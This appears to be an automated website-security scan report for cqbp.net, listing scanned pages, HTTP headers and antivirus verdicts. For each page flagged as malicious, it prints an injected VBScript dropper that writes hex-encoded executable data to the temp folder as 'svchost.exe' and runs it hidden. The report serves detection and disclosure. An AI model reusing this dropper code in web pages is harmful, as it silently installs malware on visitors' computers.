Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cqbp.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://cqbp.net/ | HTTP/1.1 200 OK Date: Mon, 22 Dec 2014 19:23:04 GMT Accept-Ranges: bytes ETag: "a6abe2337c1ad01:1f22" Server: Microsoft-IIS/6.0 Content-Length: 128224 Content-Location: http://cqbp.net/index.htm Content-Type: text/html Last-Modified: Thu, 18 Dec 2014 04:36:34 GMT X-Died: timeout at scan.pm line 1566. X-Powered-By: ASP.NET | clean |
http://cqbp.net/index.htm | 200 OK Content-Length: 128224 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://cqbp.net/page/system/inc/fun.js | 200 OK Content-Length: 6880 Content-Type: application/x-javascript | clean |
http://cqbp.net/shangwutong.js | 200 OK Content-Length: 1597 Content-Type: application/x-javascript | clean |
http://cqbp.net/tongji.js | 200 OK Content-Length: 156 Content-Type: application/x-javascript | clean |
http://cqbp.net/cqnk | HTTP/1.1 301 Moved Permanently Date: Mon, 22 Dec 2014 19:23:14 GMT Location: http://cqbp.net/cqnk/ Server: Microsoft-IIS/6.0 Content-Length: 144 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://cqbp.net/cqnk/ | HTTP/1.1 200 OK Date: Mon, 22 Dec 2014 19:23:14 GMT Accept-Ranges: bytes ETag: "72322b11207d01:1f22" Server: Microsoft-IIS/6.0 Content-Length: 120434 Content-Location: http://cqbp.net/cqnk/index.htm Content-Type: text/html Last-Modified: Sun, 23 Nov 2014 13:19:10 GMT X-Powered-By: ASP.NET | clean |
http://cqbp.net/cqnk/index.htm | 200 OK Content-Length: 120434 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://cqbp.net/baopikepu | HTTP/1.1 301 Moved Permanently Date: Mon, 22 Dec 2014 19:23:24 GMT Location: http://cqbp.net/baopikepu/ Server: Microsoft-IIS/6.0 Content-Length: 149 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://cqbp.net/baopikepu/ | HTTP/1.1 200 OK Date: Mon, 22 Dec 2014 19:23:24 GMT Accept-Ranges: bytes ETag: "dbec269207d01:1f22" Server: Microsoft-IIS/6.0 Content-Length: 122491 Content-Location: http://cqbp.net/baopikepu/index.htm Content-Type: text/html Last-Modified: Sun, 23 Nov 2014 13:18:56 GMT X-Powered-By: ASP.NET | clean |
http://cqbp.net/baopikepu/index.htm | 200 OK Content-Length: 122491 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://cqbp.net/bpweihai | HTTP/1.1 301 Moved Permanently Date: Mon, 22 Dec 2014 19:23:31 GMT Location: http://cqbp.net/bpweihai/ Server: Microsoft-IIS/6.0 Content-Length: 148 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://cqbp.net/bpweihai/ | HTTP/1.1 200 OK Date: Mon, 22 Dec 2014 19:23:31 GMT Accept-Ranges: bytes ETag: "4c31e2e207d01:1f22" Server: Microsoft-IIS/6.0 Content-Length: 122105 Content-Location: http://cqbp.net/bpweihai/index.htm Content-Type: text/html Last-Modified: Sun, 23 Nov 2014 13:19:06 GMT X-Powered-By: ASP.NET | clean |
http://cqbp.net/bpweihai/index.htm | 200 OK Content-Length: 122105 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://cqbp.net/baopitupian | HTTP/1.1 301 Moved Permanently Date: Mon, 22 Dec 2014 19:23:38 GMT Location: http://cqbp.net/baopitupian/ Server: Microsoft-IIS/6.0 Content-Length: 151 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://cqbp.net/baopitupian/ | HTTP/1.1 200 OK Date: Mon, 22 Dec 2014 19:23:38 GMT Accept-Ranges: bytes ETag: "51c8fda207d01:1f22" Server: Microsoft-IIS/6.0 Content-Length: 120108 Content-Location: http://cqbp.net/baopitupian/index.htm Content-Type: text/html Last-Modified: Sun, 23 Nov 2014 13:18:59 GMT X-Powered-By: ASP.NET | clean |
http://cqbp.net/baopitupian/index.htm | 200 OK Content-Length: 120108 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://cqbp.net/yinjingyanchang | HTTP/1.1 301 Moved Permanently Date: Mon, 22 Dec 2014 19:23:47 GMT Location: http://cqbp.net/yinjingyanchang/ Server: Microsoft-IIS/6.0 Content-Length: 155 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://cqbp.net/yinjingyanchang/ | HTTP/1.1 200 OK Date: Mon, 22 Dec 2014 19:23:47 GMT Accept-Ranges: bytes ETag: "5952bd18207d01:1f22" Server: Microsoft-IIS/6.0 Content-Length: 122504 Content-Location: http://cqbp.net/yinjingyanchang/index.htm Content-Type: text/html Last-Modified: Sun, 23 Nov 2014 13:19:22 GMT X-Powered-By: ASP.NET | clean |
http://cqbp.net/yinjingyanchang/index.htm | 200 OK Content-Length: 122504 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://cqbp.net/zaoxie | HTTP/1.1 301 Moved Permanently Date: Mon, 22 Dec 2014 19:23:54 GMT Location: http://cqbp.net/zaoxie/ Server: Microsoft-IIS/6.0 Content-Length: 146 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://cqbp.net/zaoxie/ | HTTP/1.1 200 OK Date: Mon, 22 Dec 2014 19:23:54 GMT Accept-Ranges: bytes ETag: "82fea319207d01:1f22" Server: Microsoft-IIS/6.0 Content-Length: 121901 Content-Location: http://cqbp.net/zaoxie/index.htm Content-Type: text/html Last-Modified: Sun, 23 Nov 2014 13:19:24 GMT X-Powered-By: ASP.NET | clean |
http://cqbp.net/zaoxie/index.htm | 200 OK Content-Length: 121901 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://cqbp.net/baopiwenda | HTTP/1.1 301 Moved Permanently Date: Mon, 22 Dec 2014 19:24:01 GMT Location: http://cqbp.net/baopiwenda/ Server: Microsoft-IIS/6.0 Content-Length: 150 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://cqbp.net/baopiwenda/ | HTTP/1.1 200 OK Date: Mon, 22 Dec 2014 19:24:01 GMT Accept-Ranges: bytes ETag: "d2eb4dd207d01:1f22" Server: Microsoft-IIS/6.0 Content-Length: 122080 Content-Location: http://cqbp.net/baopiwenda/index.htm Content-Type: text/html Last-Modified: Sun, 23 Nov 2014 13:19:03 GMT X-Powered-By: ASP.NET | clean |
http://cqbp.net/baopiwenda/index.htm | 200 OK Content-Length: 122080 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://cqbp.net/cqbaopi | HTTP/1.1 301 Moved Permanently Date: Mon, 22 Dec 2014 19:24:09 GMT Location: http://cqbp.net/cqbaopi/ Server: Microsoft-IIS/6.0 Content-Length: 147 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://cqbp.net/cqbaopi/ | HTTP/1.1 200 OK Date: Mon, 22 Dec 2014 19:24:09 GMT Accept-Ranges: bytes ETag: "986a1311207d01:1f22" Server: Microsoft-IIS/6.0 Content-Length: 122179 Content-Location: http://cqbp.net/cqbaopi/index.htm Content-Type: text/html Last-Modified: Sun, 23 Nov 2014 13:19:10 GMT X-Powered-By: ASP.NET | clean |
http://cqbp.net/cqbaopi/index.htm | 200 OK Content-Length: 122179 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://cqbp.net/cqbaopi/1731.htm | 200 OK Content-Length: 127255 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://cqbp.net/zbpzj.htm | 200 OK Content-Length: 123124 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://cqbp.net/bpssyy.htm | 200 OK Content-Length: 122072 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cqbp.net
Result:
HTTP/1.1 200 OK
Date: Mon, 22 Dec 2014 19:23:04 GMT
Accept-Ranges: bytes
ETag: "a6abe2337c1ad01:1f22"
Server: Microsoft-IIS/6.0
Content-Length: 128224
Content-Location: http://cqbp.net/index.htm
Content-Type: text/html
Last-Modified: Thu, 18 Dec 2014 04:36:34 GMT
X-Died: timeout at scan.pm line 1566.
X-Powered-By: ASP.NET
...128224 bytes of data.
GET / HTTP/1.1
Host: cqbp.net
Result:
HTTP/1.1 200 OK
Date: Mon, 22 Dec 2014 19:23:04 GMT
Accept-Ranges: bytes
ETag: "a6abe2337c1ad01:1f22"
Server: Microsoft-IIS/6.0
Content-Length: 128224
Content-Location: http://cqbp.net/index.htm
Content-Type: text/html
Last-Modified: Thu, 18 Dec 2014 04:36:34 GMT
X-Died: timeout at scan.pm line 1566.
X-Powered-By: ASP.NET
...128224 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cqbp.net
Referer: http://www.google.com/search?q=cqbp.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cqbp.net
Referer: http://www.google.com/search?q=cqbp.net
Result:
The result is similar to the first query. There are no suspicious redirects found.